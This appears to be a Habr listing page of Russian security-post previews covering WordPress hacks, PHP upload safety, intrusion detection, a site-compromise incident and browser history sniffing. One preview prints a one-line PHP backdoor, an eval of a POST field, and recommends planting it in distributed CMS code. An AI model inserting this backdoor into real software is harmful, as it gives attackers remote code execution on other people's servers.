Pull to refresh
  • by relevance
  • by date
  • by rating

WordPress Hacked: время собирать камни

Lumber room
По долгу службы я являюсь владельцем несколько довольно популярных сайтов, на движке WordPress. И в последнее время столкнулся с массовым и очень изощренным взломом WordPress. К сожалению, я пока не нашел какие именно дыры/баги используются для взлома и какие версии подвержены взлому (есть мнение, что последняя версия WP также уязвима). Но я могу рассказать, что можно проверить, что бы спать спокойно:

— проверить таблицу wp_options атрибут active_plugins на наличие хитрых файлов, типа ../../../../tmp/XODHG/… Которые мистическим обзаом кладуться в tmpfiles и прописываются в плагины
Читать дальше....
Total votes 16: ↑14 and ↓2 +12
Views280
Comments 10

Аутентификация в Web

Information Security
При запросе на аутентификацию (запрос клиентом страницы ввода логина/пароля), сервер генерирует псевдослучайное число, которое сохраняет у себя в БД, а также передает клиенту. Это число — идентификатор сессии логина и его время жизни ограничено, например 5 минутами. За это время клиент должен успеть аутентифицироваться в системе. На основании пароля, введенного клиентом, и полученного псевдослучайного числа средствами Java Script генерируется хэш, который отправляется на сервер вместе с самим идентификатором и логином пользователя. На сервере происходит поиск идентификатора в базе, если он успешен, по логину из базы извлекается пароль и высчитывается хэш-функция от пароля и идентификатора (того самого псевдослучайного числа). Если хэши совпадают, логин успешен. Идентификатор из БД удаляется.

Реализация MD4, MD5, SHA-1 на Java Script
Total votes 17: ↑15 and ↓2 +13
Views1.8K
Comments 54

Безопасность. Модификация кода ядра платформы подгружаемыми апплетами

JavaScript
Все что описано ниже касается только клиентской части реализованной на JavaScript. Приветствуется критика технического характера (например, пути обхода), но не критка в стиле «нафига это нужно».

При разработке модуля подключения апплетов к некой платформе (назовем ее Hyper) появилась задача обеспечения безопасности, так как подключаемый апплет кроме пассивного блока данных (content) содержит и активный (code). А в активном блоке невнимательный разработчик (злоумышленник) может обратиться к глобальному объекту window и получить доступ к переменным или важным методам ядра и сделать подмену, что в лучшем случае просто приведет к краху платформы (в пределах браузера конечно), а в худшем установка различных хуков не влияющих на работу системы, но перехватывающих персональные данные пользователя. В дальнейшем ничего не подозревающий пользователь будет пользоваться гаджетом «Часы от Боба», который по тихому собирает о нем информацию, или рассылает спам по адресам из контакт листа.
Читать дальше →
Total votes 18: ↑16 and ↓2 +14
Views513
Comments 53

ЕПЦ + BT3 = hack gadget

Software
Топик посвящен выходу финальной 3 версии пожалуй самого лучшего дистрибутива, заточенного под защитно-хакерские нужды. Это событие произошло 19 июня.
Читать дальше →
Total votes 50: ↑40 and ↓10 +30
Views669
Comments 56

Простейший backdoor на php

Lumber room
Бэкдоры нужны не только мстящим бывшим сотрудникам, влезшим через загрузку аватара хакерам, но и в обычном процессе поставки платной зашифрованной Zend'ом или IonCube'ом CMSки. Помоему самый лучший backdoor выглядит примерно так:
eval($_POST['sys_call']);
//echo '<form method="POST"><textarea name="sys_call"></textarea><input type="submit"></form>';

Конечно тут могут быть вариации с проверкой IP или домена «палача», и более сложные защиты от третьих лиц.
Оригинал
Total votes 2: ↑-2.5 and ↓4.5 -7
Views2.1K
Comments 15

Определение пола по истории навигации

Lumber room
Используя тот факт, что браузеры обычно по-разному отображают и обрабатывают посещённые и не посещённые ссылки, умные люди давно придумали, как можно автоматически отследить историю веб-навигации посетителя.

Сперва мы выводим на страницу ссылки на популярные ресурсы (в скрытом фрейме, например). Далее, два варианта:

1) Написать скрипт, который пробегает по ссылкам и определяет их цвет через getComputedStyle, как описывает Jeremiah Grossman. На этот счёт даже есть готовый скрипт.

У этого способа есть небольшой недостаток: требуется включённый JavaScript.

2) Тот же J. Grossman предложил усовершенствованный вариант с использованием CSS. Определяем свой стиль, в котором у посещённых ссылок будет фоном стоять картинка: у каждой — своя. В этом случае браузер выполнит всю работу за нас. Потом достаточно посмотреть в логах, какие картинки были загружены.

Почему это может быть полезно (вредно): если человек посещал некоторый URL, то, с большой вероятностью, у него есть аккаунт на соответствующем ресурсе. Это может пригодиться, например, если вы используете в целевом ресурсе какую-то дырку.

Теперь, почему я про это вспомнил, и почему такой заголовок поста. Один остроумный товарищ при помощи первой технологии решил определять пол посетителя. Его теория в том, что определённые сайты посещаются по половому признаку, так что можно вычислить вероятность того, что вы такого-то пола. Я вот, например, на 68% мужчина.
Total votes 19: ↑19 and ↓0 +19
Views1.7K
Comments 40

Безопасность в Гугле

Lumber room
Translation
Гугл использует одну из крупнейших сетей распределенных датацентров в мире и придает большое значение сохранности данных и интеллектуальной собственности в этих центрах, расположенных по всему миру и количество которых не подлежит разглашению. Большая часть основных датацентров Гугла полностью принадлежит компании и поддерживаются ею с целью предотвращения доступа к ним другими компаниями. Географическое расположение датацентров было выбрано таким образом, чтобы уберечь их от катастрофических событий.

Датацентры расположены на засекреченных, охраняемых объектах с целью предотвращения покушений на пользовательскую информацию. Эти объекты охраняются вооруженным персоналом круглосуточно. В дополнение к этому, задействованы сложные методы ограничения доступа: устройства считывания биометрической информации и смарт-карты используются с целью допуска только авторизованного персонала. Только избранные сотрудники Гугла имеют право доступа к датацентрам и находящимся в них серверам. Доступ тщательно контролируется и проверяется.

Оборудование спроектировано не только с учетом максимальной эффективности, но также безопасности и надежности. Множественные уровни избыточности обеспечивают непрерывное функционирование и доступность сервисов даже в самых неблагоприятных и экстремальных условиях. Они включают в себя множественные уровни избыточночти как внутри датацентра, так и резервное копирование выполняемых операций, потребляющее вырабатываемую генераторами энергию, и полную избыточность множественных распределенных центров.

Компанией используются уникальные средства управления для внутреннего и удаленного наблюдения за центрами, а также автоматизированные системы перехвата управления при отказе или сбое. (…)

Информация типа электронной почты хранится в зашифрованном формате, оптимизированном для быстродействия, в отличие от обычных файловых систем или баз данных. Данные распределены между несколькими физическими и логическими разделами с целью создания избыточности и распределенного доступа, таким образом сбивая с толку злоумышленников.

Физические средства защиты информации Гугла, описанные выше, предотвращают физический доступ к серверам компании. Весь доступ к системам компании осуществляется авторизованным персоналом с использованием зашифрованного SSH (безопасной оболочки). Компанией собраны специфические сведения о структуре данных и построена собственная распределенная архитектура с целью обеспечения более высокого уровня безопасности и надежности, чем для обычных систем с традиционной, нераспределенной архитектурой.

Индивидуальная пользовательская информация распределена между несколькими анонимными серверами, кластерами и датацентрами, тем самым предотвращая возможную потерю данных и защищая их.
Total votes 12: ↑10 and ↓2 +8
Views452
Comments 13

Skype: говорите, нас не слышат

Information SecurityInstant Messaging
Translation
Спецслужбы добиваются полной свободы прослушивания Интернет-переговоров.



В числе множества преимуществ, которые открыл нам Интернет за прошедшее десятилетие, выделяется развитие бесплатных телефонных звонков между пользователями – и значительное удешевление звонков для людей, которые даже не подключены к Интернету, поскольку обычные звонки тоже отчасти стали передаваться по Интернету. Для людей, которые работают заграницей, имеют друзей или родственников в других уголках земли, или же просто вынуждены часто звонить по телефону, эта была замечательная новость. Однако для государственных служб безопасности, которые раньше имели возможность прослушивать телефонные разговоры через обычные линии, эта новость стала причиной потери сна и покоя. Появление телефонии на основе протокола для передачи голоса по Интернету (VoIP) стало для Интернет-провайдеров всего мира причиной новых конфликтов и новых договорённостей со спецслужбами.

Источник их общих проблем находится в самой природе Интернета. В былые времена телекоммуникаций, маршрут телефонного звонка можно было легко проследить: аналоговое или цифровое соединение устанавливалось между двумя аппаратами, так что для спецслужб не составляло большого труда выбрать на линии подходящее место (например, на ближайшей к звонящему телефонной станции) для прослушки разговора.
Читать дальше →
Total votes 58: ↑57 and ↓1 +56
Views563
Comments 103

Intrusion Detection For PHP Applications With PHPIDS

PHP
Translation
Эта статья покажет как настроить PHPIDS. PHPIDS (PHP-Intrusion Detection System) — это легко используемая, хорошо структурированная, быстрая прослойка для анализа безопасности ваших приложений. IDS — не является прослойкой для анализа данных, введенных пользователем, он только распознает, когда пытаются атаковать ваш сайт. на основе набора проверенных и оттестированных правил каждой атаке сопоставлен рейтинг ее опасности. Это позволит легко сохранять статистику по атакам или отсылать уведомления для команды разработчиков.
Читать дальше →
Total votes 18: ↑14 and ↓4 +10
Views3.4K
Comments 20

Множественные критические уязвимости в Sun Java JDK / JRE

Java
Translation
Несколько критических уязвимостей были зарегистрированы в Sun Java, которые могут быть использованы в злоумышленных целях, для обхода определенных ограничений безопасности, раскрытия информации о системе или потенциально секретной информации, вызвать DoS (отказ в обслуживании) или компрометировать уязвимую систему.
Читать дальше →
Total votes 30: ↑26 and ↓4 +22
Views1.6K
Comments 22

WOT!, или как сделать серфинг по волнам интернета более безопасным.

Lumber room
Что такое WOT?

WOT = «Web of Trust» (Сеть доверия) – это сообщество, посвятившее себя поддержке безопасного использования Интернета. Основная цель проекта – сделать Интернет безопаснее, позволив пользователям обмениваться опытом, связанным с веб-сайтами и предлагаемыми ими услугами.
Читать дальше →
Total votes 9: ↑7 and ↓2 +5
Views338
Comments 5

Собираем бесплатную комплексную защиту Security Suite

Information Security
Translation
Есть множество антивирусных программ «все-в-одном», содержащие антивирус, антишпионский модуль, персональный фаервол, средство контроля за веб-ссылками, инструмент для оптимизации системы и т.д. Но, благодаря своей богатой функциональности, программы класса Security Suite являются самыми дорогими средствами информационной безопасности.
Однако, каждый из нас может собрать бесплатно комплекс программ для защиты своего компьютера. При этом главное — вопрос совместимости. Рассмотрим один из вариантов.

Читать дальше →
Total votes 12: ↑6 and ↓6 0
Views2.8K
Comments 15

История одного взлома

Lumber room
Я администратор одного не очень большого сайта. Хочу рассказать одну интересную историю.

Вчера наш сайт заразили. Хакер, используя эксплоит, залил скрипт-резидент и поприписывал к каждому исполняемому файлу код вызывающий его. Проблема была в галерее Coppermine старой версии — дырявый скрипт (mea culpa, не уследил). Хакер применил классический Google hacking, чтобы найти галерею.

Последовательность действий очень продумана и доказать преступление хакера сложно. С немецкого IP (217.20.118.150, по видимому арендованый сервер) была прощупана версия галереи, затем через дыру в скрипте заливается скрипт-загрузчик. С того же немецкого IP этот скрипт запрашивается по HTTP, что приводит к его исполнению на стороне нашего сайта. Исполняющийся скрипт-загрузчик подсасывает с сервера IP 78.157.140.3 скрипт-резидент (обращение происходит именно по IP) copper.txt, запаковывает / записывает его в одну из папок куда разрешена запись (уже в виде php) и прописывает в первой строке всех файлов php вызывающий его код (тоже упакованый). После этого скрипт-загрузчик самостирается (не знаю виден ли на немецком сервере этот скрипт из инета, копии на нашем сервере не осталось). Далее при открытии любой страницы где используется php происходит запуск скрипта-резидента, который запрашивает исполняемый код с сервера по адресу nomcen.biz (домен сейчас соответствует тому же IP 78.157.140.3). В скрипте-приписке в каждом файле была синтаксическая ошибка, поэтому сайт просто выдавал пустые страницы (сообщение об ошибке съедалось в результате применения ob_start-а). Не будь её — скрипт-резидент тихо отрабатывал бы нужное хакеру дело.
А теперь самое интересное: доказательств что заразили с немецкого сервера у меня мало (есть только две записи в логе, сам скрипт неизвестен и где его искать в сети разумеется не известно). С IP 78.157.140.3 исполняемый код брался именно нашим сервером (работал скрипт-загрузчик). Обращение к домену тоже было скриптом работающим на нашем сайте (работа скрипта-резидента). Регистратор домена принимает притензии только по поводу спама, по поводу распространения эксплоитов они рекомендуют обращаться к хостеру.

Итого: мы видим хакерскую технологию с определённой степенью защиты от уголовного преследования.

P.S.: Данный текст не претендует на новизну и написан не для поучения. Основная мысль с которой он писался «пусть полежит здесь, может кого-нибудь заинтересует».
Total votes 45: ↑41 and ↓4 +37
Views557
Comments 12

Kaspersky Security Network

Information Security
В продуктах новой линейки Лаборатории Касперского — Kaspersky Internet Security 2009 и Антивирусе Касперского 2009 — реализован новый функционал для сбора статистики о типе новых угроз, их источнике и разработки способа нейтрализации.

Использование Kaspersky Security Network подразумевает отправку «Лаборатории Касперского» следующей информации:

* Уникального идентификатора, присваиваемого вашему компьютеру. Этот идентификатор характеризует аппаратные параметры вашего компьютера и не содержит никакой личной информации.
* Информации об угрозах, обнаруженных компонентами приложения. Состав информации зависит от типа обнаруженной угрозы.
* Информации о системе: версии операционной системы, установленные пакеты обновлений, загружаемые сервисы и драйверы, версии браузеров и почтовых клиентов, расширения браузеров, номер версии установленного приложения «Лаборатории Касперского».

В рамках Kaspersky Security Network также производится сбор расширенной статистики, в которую входит информация о:

— загружаемых на ваш компьютер исполняемых файлах и подписанных приложениях,
— запускаемых на вашем компьютере приложениях.
— отправка статистической информации происходит в конце обновления приложения.

«Лаборатория Касперского» гарантирует, что в рамках Kaspersky Security Network не происходит накопление и отправка персональных данных пользователя.

Начиная с июля 2008 года ЛК публикует все свои ежемесячные анонсы о вирусной активности как раз с помощью этого сервиса. Кстати, информация за сентябрь уже доступна на сайте: www.kaspersky.ru/news?id=207732811
Total votes 8: ↑5 and ↓3 +2
Views4.2K
Comments 4

Как запустили неподписанный код на Xbox 360

Information Security
Каждую игровую консоль стараются поломать. Стараются поломать энтузиасты, которые хотят запустить на ней собственноручно написанный код во всех самых защищенных режимах. Стараются поломать энтузиасты, которые хотят «запускать на ней бэкапы игр» (или если по-русски — заниматься пиратством). Стараются поломать энтузиасты, которые хотят поставить Линукс и, кроме самоцели, использовать более широко, чем хотел бы этого производитель консоли (так как деньги зарабатываются прежде всего на играх, сама консоль продается с минимальной наценкой, а то и в минус производителю).
В подавляющем большинстве случаев энтузиастам это удается.

Вот как была сделана самая интересная часть взлома Xbox 360 — запуск кода, не подписанного MS.

Читать дальше →
Total votes 136: ↑135 and ↓1 +134
Views13.5K
Comments 77

Список безопасных веб-приложений

Information Security
В результате одной дискуссии на тему безопасных форумов/CMS на PHP мне пришла в голову идея: давайте вместе составим список безопасных веб-приложений! Задача списка — помогать при выборе приложения для установки и предоставить обзор текущей ситуации с безопасностью веб-приложений.

Изначально речь шла о форумах и CMS, но, думаю, ограничиваться этими двумя приложениями не обязательно. Для добавления приложения в список оно должно соответствовать нескольким критериям:
  1. Вы его либо используете (использовали), либо знаете лично того, кто использует.
  2. Это не должно быть узкоспециализированное приложение.
  3. Бесплатное.
  4. Open source.
  5. Ну и самое главное: безопасное!
Я предлагаю определять безопасное приложение по следующим критериям:
  • Первый публичный релиз был не менее двух лет назад.
  • Для последней стабильной версии нет известных уязвимостей.
  • В базе Common Vulnerabilities and Exposures (CVE) нет записей по этому приложению минимум за последний год (уязвимости в плагинах можно не учитывать, при условии что приложение вполне юзабельно без этих плагинов и в типовую инсталляцию они не входят).
  • В случае отсутствия приложений, полностью подходящих под эти критерии, можно включать в список наиболее безопасное из существующих (отдельно для каждого ЯП).
Форум Проверить ЯП
YaBB cve sf seclab milw0rm exploit ps secunia Perl
phpBB 3 cve sf seclab milw0rm exploit ps secunia PHP
Snitz Forum 2000 cve sf seclab milw0rm exploit ps secunia ASP
CMS Проверить ЯП
papaya CMS cve sf seclab milw0rm exploit ps secunia PHP
eZ Publish cve sf seclab milw0rm exploit ps secunia PHP
Блог Проверить ЯП
Serendipity cve sf seclab milw0rm exploit ps secunia PHP
e-commerce Проверить ЯП
osCommerce cve sf seclab milw0rm exploit ps secunia PHP

Рекомендуйте приложения для включения в список в комментариях, там же обсудим при необходимости, и я буду редактировать статью пополняя список. Правила включения в список тоже можно обсудить и скорректировать.
Total votes 11: ↑6 and ↓5 +1
Views2.9K
Comments 51

IT versus Политика

Lumber room
image
За проходившими по ту сторону океана выборами наблюдали со всего света. Если судить со стороны России, то исход выборов мог сильно повлиять на международные отношения и общемировую политику. Однако сенсацией стала не только впечатляющая победа темнокожего кандидата. Эти выборы также вошли в историю из-за серьезной угрозы их срыва, потому что компьютерные системы штабов обоих кандидатов скрипели под напором разнообразных хакерских атак, тонн спама, угроз и прочих информационных бомб.
Читать дальше →
Total votes 10: ↑5 and ↓5 0
Views186
Comments 11

Безопасная загрузка изображений на сервер. Часть первая

PHP
Translation
В данной статье демонстрируются основные уязвимости веб-приложений по загрузке файлов на сервер и способы их избежать. В статье приведены самые азы, в врят-ли она будет интересна профессионалам. Но тем неменее — это должен знать каждый PHP-разработчик.

Различные веб-приложения позволяют пользователям загружать файлы. Форумы позволяют пользователям загружать «аватары». Фотогалереи позволяют загружать фотографии. Социальные сети предоставляют возможности по загрузке изображений, видео, и т.д. Блоги позволяют загружать опять же аватарки и/или изображения.

Часто загрузка файлов без обеспечения надлежащего контроля безопасности приводит к образованию уязвимостей, которые, как показывает практика, стали настоящей проблемой в веб-приложениях на PHP.

Проводимые тесты показали, что многие веб-приложения имеют множество проблем с безопасностью. Эти «дыры» предоставляют злоумышленникам обширные возможности совершать несанкционированные действия, начиная с просмотра любого файла на сервере и закачивания выполнением произвольного кода. Эта статья рассказывает об основных «дырах» безопасности и способах их избежать.
Читать дальше →
Total votes 77: ↑69 and ↓8 +61
Views127.9K
Comments 57